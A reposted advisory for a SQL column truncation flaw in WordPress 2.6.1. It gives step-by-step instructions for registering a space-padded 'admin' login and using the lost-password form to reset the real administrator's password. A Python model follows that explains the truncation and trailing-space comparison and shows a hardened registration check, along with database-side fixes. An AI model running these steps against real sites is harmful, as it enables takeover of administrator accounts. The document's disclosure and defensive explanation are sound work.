Analysis of the WordPress 2.6.1 SQL Column Truncation Vulnerability
Source: Internet  Editor: 程序博客网  Time: 2024/06/03 20:16
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remotely change the admin password, if registration is enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin[55 space chars]x
email: your email
now we have a duplicated 'admin' account in the database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into the field and submit the form
5. check your email and go to the reset confirmation link
6. admin's password is changed, but the new password will be sent to the correct admin email ;/
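
Why step 2 leaves a second 'admin' row, and a registration check that prevents it, as an added example (not code from the advisory or from WordPress). It models two MySQL behaviours: non-strict inserts cut a value to the column width, and string comparison under a PAD SPACE collation ignores trailing spaces. The column width of 60 and all function names are assumptions; the input is constructed from the shape given in step 2.

```python
COLUMN_WIDTH = 60  # assumption: login column width (5 + 55 chars fit, the 'x' does not)


def stored_form(value, width=COLUMN_WIDTH):
    """What a non-strict MySQL INSERT keeps: the value cut to the column width."""
    return value[:width]


def sql_equal(a, b):
    """String '=' under a PAD SPACE collation: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


def naive_is_taken(candidate, stored_logins):
    """Pre-insert check on the untruncated input (SELECT ... WHERE login = ?)."""
    return any(sql_equal(candidate, s) for s in stored_logins)


def safe_is_taken(candidate, stored_logins, width=COLUMN_WIDTH):
    """Hardened check: refuse over-long input, then compare in stored form."""
    if len(candidate) > width:
        raise ValueError("login longer than column; reject instead of truncating")
    return any(sql_equal(stored_form(candidate, width), s) for s in stored_logins)


def register(candidate, stored_logins, check):
    """Append the login (as the database would store it) if the check says it is free."""
    if check(candidate, stored_logins):
        return False
    stored_logins.append(stored_form(candidate))
    return True


def demo():
    crafted = "admin" + " " * 55 + "x"  # constructed input, 61 characters
    table = ["admin"]
    accepted = register(crafted, table, naive_is_taken)
    rows_matching_admin = sum(1 for s in table if sql_equal(s, "admin"))
    try:
        register(crafted, ["admin"], safe_is_taken)
        rejected = False
    except ValueError:
        rejected = True
    return accepted, rows_matching_admin, rejected


if __name__ == "__main__":
    print(demo())
```

At the database layer, a strict `sql_mode` such as `STRICT_ALL_TABLES` turns the silent truncation into error 1406 ("Data too long for column"), and a UNIQUE index on the login column rejects the second row.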